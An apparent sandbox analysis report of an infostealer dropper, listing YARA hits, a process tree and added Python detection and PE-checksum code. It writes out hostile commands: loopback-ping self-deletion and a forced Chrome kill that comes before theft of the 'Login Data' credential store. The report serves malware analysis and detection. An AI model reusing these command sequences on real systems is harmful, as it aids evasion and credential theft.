Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPE, Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991058 CoCreateInstance,
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Login Data1611970607033Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to behavior
Source: Cyfj6XGbkd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611970637183.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Cyfj6XGbkd.exeVirustotal: Detection: 40%
Source: Cyfj6XGbkd.exeMetadefender: Detection: 24%
Source: Cyfj6XGbkd.exeReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Users\user\Desktop\Cyfj6XGbkd.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Process created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
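The process tree above shows two behaviours worth turning into detection logic: each stage removes itself with `cmd /c ping 127.0.0.1 -n N & del <own path>` (the loopback ping is a sleep that keeps the shell alive until the parent has exited and its file is no longer locked), and the second stage runs `taskkill /f /im chrome.exe` before touching the browser's `Login Data` store, which Chrome keeps locked while it is running. The following is an added example, not part of the report or of any Joe Sandbox tooling; it runs two such rules over constructed process-creation events whose paths and command lines are copied from the rows above, with the pid/ppid values made up. The `origin` walk up the parent chain past `cmd.exe`/`conhost.exe` is what turns "a cmd.exe deleted a file" into "56BB1610C0318054.exe deleted itself".

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events modelled on the "Process created" rows in
# the report; pid/ppid numbers are invented, paths and command lines are the report's.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Users\user\Desktop\Cyfj6XGbkd.exe",
     "cmdline": r"'C:\Users\user\Desktop\Cyfj6XGbkd.exe'"},
    {"pid": 11, "ppid": 10, "image": r"C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01"},
    {"pid": 12, "ppid": 10, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'"},
    {"pid": 13, "ppid": 12, "image": r"C:\Windows\SysWOW64\PING.EXE",
     "cmdline": r"ping 127.0.0.1 -n 3"},
    {"pid": 14, "ppid": 11, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /c taskkill /f /im chrome.exe"},
    {"pid": 15, "ppid": 14, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmdline": r"taskkill /f /im chrome.exe"},
    {"pid": 16, "ppid": 11, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'"},
    # Benign control: an operator pinging a remote host; must not fire.
    {"pid": 17, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c ping 10.0.0.7 -n 3"},
]

# "ping <loopback> -n N" used as a sleep, chained with "del <path>" in the same shell.
PING_DEL = re.compile(
    r"ping\s+(?:127\.0\.0\.1|localhost|::1)\s+-n\s+(\d+)"
    r".*?&+\s*del\b(?:\s+/[a-z])*\s+['\"]?([^'\"&]+?)['\"]?\s*$", re.I)
# Forced termination of a browser, the usual prelude to copying its credential DB.
KILL_BROWSER = re.compile(r"/im\s+(chrome|msedge|firefox|iexplore|opera)\.exe", re.I)
LAUNCHERS = {"cmd.exe", "conhost.exe", "powershell.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def origin(ev: dict, by_pid: dict) -> dict:
    """Walk up the parent chain past shell launchers to the process that started the chain."""
    cur, seen = ev, set()
    while cur["pid"] not in seen:
        seen.add(cur["pid"])
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return cur
        if basename(parent["image"]) not in LAUNCHERS:
            return parent
        cur = parent
    return cur


def analyze(events: list) -> list:
    """Return one finding dict per matching event; events that match nothing are ignored."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        m = PING_DEL.search(ev["cmdline"])
        if m:
            src = origin(ev, by_pid)
            target = m.group(2).strip()
            findings.append({
                "rule": "ping_sleep_then_delete", "pid": ev["pid"],
                "origin": src["image"],
                # -n N sends N echo requests about a second apart: roughly N-1 s of delay.
                "approx_sleep_seconds": int(m.group(1)) - 1,
                "deleted": target,
                "self_delete": target.lower() == src["image"].lower(),
            })
        if basename(ev["image"]) == "taskkill.exe":
            k = KILL_BROWSER.search(ev["cmdline"])
            if k:
                src = origin(ev, by_pid)
                findings.append({
                    "rule": "browser_forced_kill", "pid": ev["pid"],
                    "origin": src["image"], "browser": k.group(1).lower() + ".exe",
                })
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

On a real host the same two rules apply to Sysmon event ID 1 or EDR process telemetry; pairing `browser_forced_kill` with a subsequent file creation named like `Login Data*` outside the Chrome profile directory (the report shows `C:\Users\user\AppData\Local\Login Data1611970607033`) by the same origin process is the high-confidence version of the credential-theft rule.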
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Install
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Cyfj6XGbkd.exe | Static file information: File size 4247224 > 1048576
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Unpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Unpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: MSIDCDD.tmp.1.dr | Static PE information: real checksum: 0x0 should be: 0x2d22
Source: Cyfj6XGbkd.exe | Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: 56BB1610C0318054.exe.0.dr | Static PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_004038A0 push eax; ret
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_10010579 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 1_2_046BD9FC pushfd ; iretd
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611970637183.exe | Code function: 9_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611970637183.exe | Code function: 9_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1611970637183.exe | Code function: 9_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 18_2_00993FB5 push ecx; ret
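The "real checksum ... should be" rows come from recomputing `IMAGE_OPTIONAL_HEADER.CheckSum` over the file: a linker fills it in, so a stored value of 0 (MSIDCDD.tmp) or a value that no longer matches (Cyfj6XGbkd.exe, 0xd69e9 against 0x41116d) means the image was packed, patched or rebuilt after linking. The checksum is not a security control, since anyone can recompute it, but a mismatch is a cheap triage signal. The following is an added example, not code from the report or from Joe Sandbox: it implements the PE checksum algorithm (the one `CheckSumMappedFile` computes: 32-bit word sum with carry folding, skipping the CheckSum field, folded to 16 bits plus the file length), locates the field from `e_lfanew`, and checks or repairs a file. The `build_minimal_pe` helper fabricates a header-only image purely so the example runs offline; it is not a real executable.

```python
import struct


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum over a whole file image.

    Every 32-bit little-endian word except the CheckSum field itself is added,
    carries out of bit 32 are folded back in, the sum is folded to 16 bits and
    the file length is added. A trailing partial word is zero-padded.
    """
    if checksum_offset % 4:
        raise ValueError("CheckSum field is DWORD aligned in any valid PE")
    padded = data + b"\0" * (-len(data) % 4)
    skip = checksum_offset // 4
    total = 0
    for i in range(0, len(padded), 4):
        if i // 4 == skip:
            continue
        total += int.from_bytes(padded[i:i + 4], "little")
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    total &= 0xFFFF
    return total + len(data)


def checksum_field_offset(data: bytes) -> int:
    """e_lfanew -> 'PE\\0\\0' (4) + COFF header (20) + 64 bytes into the optional header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return e_lfanew + 4 + 20 + 64


def verify_checksum(data: bytes):
    """Return (stored, computed, stored == computed), the triple the report rows summarise."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    computed = pe_checksum(data, off)
    return stored, computed, stored == computed


def fix_checksum(data: bytes) -> bytes:
    """Write the correct value back (what a linker or a post-build tool does)."""
    off = checksum_field_offset(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, off, pe_checksum(data, off))
    return bytes(buf)


def build_minimal_pe(payload: bytes = b"") -> bytes:
    """Constructed header-only PE32 image with CheckSum = 0; a test stand-in, not loadable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)  # i386, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<I", opt, 64, 0)                          # CheckSum left at 0, as in MSIDCDD.tmp
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + payload


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(b"\x90" * 37)
    stored, computed, ok = verify_checksum(data)
    print(f"real checksum: {stored:#x} should be: {computed:#x} ({'ok' if ok else 'MISMATCH'})")
```

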